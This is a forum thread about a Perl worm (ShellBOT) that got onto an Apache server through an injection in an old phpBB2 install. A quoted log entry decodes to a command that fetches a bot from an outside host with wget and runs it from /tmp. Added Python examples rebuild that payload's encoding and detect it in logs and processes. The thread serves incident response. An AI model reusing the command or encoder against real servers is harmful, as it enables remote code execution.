# I have got this worm, ShellBOT, attacking my Apache 1.3

## Idler921

It is located at /tmp/.bot; there are two files headed with:

```
#
#  ShellBOT
#              0ldW0lf - old-wolf@zipmail.com
#                      - www.atrix-br.cjb.net
#                      - www.atrix.cjb.net
#
#
# isso eh meu B0tchZ reformulado      [Portuguese: this is my reworked B0tchZ]
#
###############################
#  killah... vai c ferrah :)  #      [Portuguese: killah... go screw yourself :)]
###############################
```

```
# ASW worm 7nd modification - MyPrettyWorm.perl !
# Created ( riped ) by br0k3d@gmail.com
# Fuckz google ! Fuckz MSN ! Fuckz Fotolog.net
```

----------

## dannycool

Wipe, reinstall.

----------

## Idler921

 *dannycool wrote:*   

> Wipe, reinstall.

Is there any other method to deal with this? I don't want to stop the server.

Thanks

----------

## zerojay

Take the box offline, find out how you were compromised, wipe the box completely clean, reinstall and be sure to protect against the way you were compromised.

----------

## Idler921

I've chmodded the /tmp/.bof file to 000.

I think not only the system's files are infected, as I can see these continuous error messages in my Apache error_log.

 *Quote:*   

> Can't open perl script "/tmp/.bof/.bot": Permission denied
> /tmp/.bof/.bot: Permission denied
> ...

 

I used clamav to scan my document root and found nothing.

----------

## zerojay

You can't trust anything running on the machine at the moment, plain and simple. It's very possible that the damage has been done and rootkits have been installed with root shells available to anyone and hidden from view. Don't bother trying to fix it. Just learn your lesson and start with a fresh slate.

----------

## Idler921

 *Quote:*   

> /phpBB2/viewtopic.php?p=82&highlight=%2527%252Esystem(chr(119)%252Echr(103)%252Echr(101)%252Echr(116)%
> 
> 252Echr(32)%252Echr(102)%252Echr(114)%252Echr(97)%252Echr(103)%252Echr(46)%252Echr(112)%252Echr(114)%252Echr(111)%252Echr(46)%252Echr(9%252Echr(114)%252E
> 
> chr(47)%252Echr(100)%252Echr(101)%252Echr(97)%252Echr(100)%252Echr(99)%252Echr(111)%252Echr(119)%252Echr(47)%252Echr(9%252Echr(111)%252Echr(116)%252Echr(
> ...

 

This log entry was found in an old, outdated, unused phpBB2 forum.

Decoded, it becomes:

 *Quote:*   

> system("wget frag.pro.br/deadcow/bot -O /tmp/.bof/.bot;perl /tmp/.bof/.bot;touch /tmp/.bset")

 

So I think I've found and killed the source by rm -rf phpBB2.

I hope there's no other security hole......
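The decoding Idler921 did by hand, as an added example that is not part of the original thread: a small Python helper that pulls the `highlight` parameter out of an Apache access log line, URL-decodes it twice (the request was double-encoded: `%2527` becomes `%27` and then `'`), and collapses the `chr(N).chr(N)...` run into the string PHP would have built. The log lines are constructed inside the script to follow the pattern quoted above, since the original log is truncated; the regexes, the marker list and the function names are my own, not phpBB's or the worm's.

```python
import re
from urllib.parse import unquote

# Constructed sample data (not the original server's log). The command string
# is the one Idler921 decoded from the real request; the encoder below only
# exists to rebuild a log line in the worm's style so the script runs offline.
PAYLOAD_CMD = ("wget frag.pro.br/deadcow/bot -O /tmp/.bof/.bot;"
               "perl /tmp/.bof/.bot;touch /tmp/.bset")

def encode_highlight_payload(cmd):
    """Build a highlight= value in the worm's style: double-encoded quote and
    dots, command spelled out as chr(N) calls. Used only for the sample."""
    chrs = "%252E".join(f"chr({ord(c)})" for c in cmd)
    return f"%2527%252Esystem({chrs})%252E%2527"

SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [12/Nov/2005:03:14:07 +0000] "GET /phpBB2/viewtopic.php?p=82&highlight='
    + encode_highlight_payload(PAYLOAD_CMD) + ' HTTP/1.0" 200 1234',
    '10.0.0.6 - - [12/Nov/2005:03:15:22 +0000] "GET /phpBB2/viewtopic.php?t=5&highlight=gentoo HTTP/1.1" 200 9876',
]

HIGHLIGHT_RE = re.compile(r"[?&]highlight=([^&\s\"]+)")
CHR_RUN_RE = re.compile(r"(?:chr\(\d+\)\.?)+")
# PHP functions that should never appear in a forum search term.
PHP_EXEC_MARKERS = ("system(", "exec(", "passthru(", "shell_exec(", "chr(")

def decode_highlight(log_line):
    """Return the highlight value as the vulnerable code would have seen it."""
    m = HIGHLIGHT_RE.search(log_line)
    if not m:
        return ""
    # Apache logs the raw request. PHP decodes it once into $_GET, and the
    # phpBB2 highlight handling decoded it a second time, so decode twice.
    decoded = unquote(unquote(m.group(1)))

    def expand(run):
        # chr(119).chr(103)... -> "wg..." so the command is readable.
        text = "".join(chr(int(n)) for n in re.findall(r"chr\((\d+)\)", run.group(0)))
        return '"' + text.replace("\\", "\\\\").replace('"', '\\"') + '"'

    return CHR_RUN_RE.sub(expand, decoded)

def scan_access_log(lines):
    """(line_number, decoded_highlight) for lines that look like injection."""
    hits = []
    for n, line in enumerate(lines, 1):
        decoded = decode_highlight(line)
        if decoded and any(marker in decoded for marker in PHP_EXEC_MARKERS):
            hits.append((n, decoded))
    return hits

if __name__ == "__main__":
    for n, decoded in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f"line {n}: {decoded}")
```

Run it over the real access_log with `scan_access_log(open(path))` to see every request that tried the same trick, not just the one that happened to be noticed; the double `unquote` is the important part, because a single decode still shows `%27` and hides the quote that breaks out of the string.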

----------

## kimchi_sg

 *Idler921 wrote:*   

> so. I think I've found and kill the source by rm -rf phpBB2.
> 
> I hope there's no other security hole......

 

"I think" and "I hope" cannot be in a server administrator's vocabulary, as far as system integrity is concerned. You have to be absolutely and totally sure about it, and that is why I say:

There is no substitute for a re-install at this point.

----------

## Chris W

My sympathies Idler921, but I concur with the other advice.  The only way to clean the machine with any certainty is to reinstall.  You cannot trust anything on the machine any longer including any distfiles you might have cached (i.e. don't use these when rebuilding).

----------

## Idler921

I see

then let's do it

----------

## transient

That is a PHP exploit that was doing the rounds a while ago. 

And please please update to apache 2.x -_-

----------

## xbmodder

i am rolling on the floor laughing

----------

## Pink

 *xbmodder wrote:*   

> i am rolling on the floor laughing

 

Umm, why?

----------

## AndCycle

 *transient wrote:*   

> That is a PHP exploit that was doing the rounds a while ago. 
> 
> And please please update to apache 2.x -_-

 

I don't think so; I just got one today with Apache 2.0.54/PHP 4.3.11.

It's just an exploit of old phpBB.

 *Quote:*   

> #############################################################
> 
> #   Developed by br0k3d                                     #
> 
> #   For educational purpose only                            #
> ...

 

----------

## u238

 *AndCycle wrote:*   

>  *transient wrote:*   That is a PHP exploit that was doing the rounds a while ago. 
> 
> And please please update to apache 2.x -_- 
> 
> I don't think so, I just got one today with apache 2.0.54/php 4.3.11,
> ...

 

Where did you find this exploit? It could be interesting to study it!

----------

## ter_roshak

 *u238 wrote:*   

>  *AndCycle wrote:*    *transient wrote:*   That is a PHP exploit that was doing the rounds a while ago. 
> 
> And please please update to apache 2.x -_- 
> 
> I don't think so, I just got one today with apache 2.0.54/php 4.3.11,
> ...

 

Just install a vulnerable version of phpBB and wait a few hours, you'll have your very own copy to study.

----------

## corley

Erm... well, from what I've read, that is about any phpBB version. If you are running phpBB you definitely need to check their site regularly for updates.

 *ter_roshak wrote:*   

>  *u238 wrote:*    *AndCycle wrote:*    *transient wrote:*   That is a PHP exploit that was doing the rounds a while ago. 
> 
> And please please update to apache 2.x -_- 
> 
> I don't think so, I just got one today with apache 2.0.54/php 4.3.11,
> ...

 

----------

## rex123

I'm coming in really late on this, but I want to make a point I've made before...

I don't think it's necessary to reinstall the whole system just because an apache process has managed to write a file to /tmp.

/tmp is world-writable, so a process with amazingly few permissions (like apache) can write to it.

Internet worms try to take advantage of this by writing to /tmp and then executing the file, which is normally a perl script that tries to send itself to other machines. This is *not* a sign of a rootkit. It really isn't.

 *Idler921 wrote:*   

> I've chmod the /tmp/.bof file to 000.
> 
> I think not only the system's file infracted, as I can see these continuous error message in my apache's error_log.
> 
>  *Quote:*   
> ...

 

In this case, it didn't even manage to execute, so it was a dead end for the worm.

Yes, upgrade phpBB - or remove it. But don't give in to all the paranoia, fear, uncertainty and doubt unless it's warranted.
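The thread splits on whether the payload ever ran under the web server user, and that is checkable. As an added example that is not from the thread or any participant, the Python below does the three checks that question needs: list the hidden entries in a /tmp-like directory with their owner and mode, parse a /proc/mounts line to see whether /tmp is noexec, and pick out processes of the web user whose command is an interpreter reading a file under /tmp. The directory, the mounts line and the `ps` output are constructed inside the script so it runs offline; the web user name `apache`, the interpreter list and the function names are my assumptions.

```python
import os
import stat
import tempfile
from pathlib import Path

# Everything below is constructed so the script runs offline. On a real box
# you would point hidden_tmp_entries() at /tmp, feed tmp_noexec() the text of
# /proc/mounts, and feed interpreter_runs_from_tmp() the output of
# `ps -eo user,pid,args`.
WEB_USER = "apache"          # assumption: the account httpd workers run as
INTERPRETERS = ("perl", "python", "sh", "bash", "php")

SAMPLE_MOUNTS = "tmpfs /tmp tmpfs rw,nosuid,nodev,noexec,relatime 0 0\n"
SAMPLE_PS = [
    "USER       PID COMMAND",
    "root         1 /sbin/init",
    "apache     812 /usr/sbin/httpd -DSSL",
    "apache    2291 perl /tmp/.bof/.bot",
    "idler     3010 vim /home/idler/notes",
]

def make_demo_tmp():
    """Create a throwaway directory shaped like the thread's /tmp: a dotdir
    dropper plus an ordinary file. Constructed data, not a real infection."""
    d = Path(tempfile.mkdtemp(prefix="demo_tmp_"))
    (d / ".bof").mkdir()
    (d / ".bof" / ".bot").write_text("#!/usr/bin/perl\n# placeholder\n")
    (d / "session_abc").write_text("")
    return str(d)

def hidden_tmp_entries(tmpdir):
    """Dot-entries directly under tmpdir with owner uid and mode string.
    Droppers hide as /tmp/.something; sockets like .X11-unix are normal."""
    out = []
    for p in Path(tmpdir).iterdir():
        if p.name.startswith("."):
            st = p.lstat()
            out.append((p.name, st.st_uid, stat.filemode(st.st_mode)))
    return sorted(out)

def tmp_noexec(mounts_text):
    """True if /tmp is mounted noexec according to /proc/mounts-style text."""
    for line in mounts_text.splitlines():
        f = line.split()
        if len(f) >= 4 and f[1] == "/tmp":
            return "noexec" in f[3].split(",")
    return False

def interpreter_runs_from_tmp(ps_lines, user=WEB_USER):
    """(pid, command) for processes of `user` whose argv[0] is an interpreter
    and whose arguments reference /tmp, the shape of `perl /tmp/.bof/.bot`."""
    hits = []
    for line in ps_lines[1:]:                 # skip the ps header line
        f = line.split(None, 2)
        if len(f) < 3:
            continue
        u, pid, cmd = f
        argv = cmd.split()
        if (u == user and os.path.basename(argv[0]) in INTERPRETERS
                and any(a.startswith("/tmp/") for a in argv[1:])):
            hits.append((int(pid), cmd))
    return hits

if __name__ == "__main__":
    demo = make_demo_tmp()
    print("hidden entries:", hidden_tmp_entries(demo))
    print("/tmp noexec:", tmp_noexec(SAMPLE_MOUNTS))
    print("interpreters from /tmp:", interpreter_runs_from_tmp(SAMPLE_PS))
```

Two caveats a practitioner should keep in mind when reading the results. A `noexec` /tmp does not stop the command the worm used, because `perl /tmp/.bof/.bot` has perl open the file as data rather than the kernel executing it; noexec only blocks a direct `/tmp/.bof/.bot`. And a dropper chmodded to 000, as Idler921 did, shows up here as `d---------` owned by the web user, which together with the repeated "Permission denied" lines in error_log is consistent with the same request still being sent, not with the worm having run.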

----------

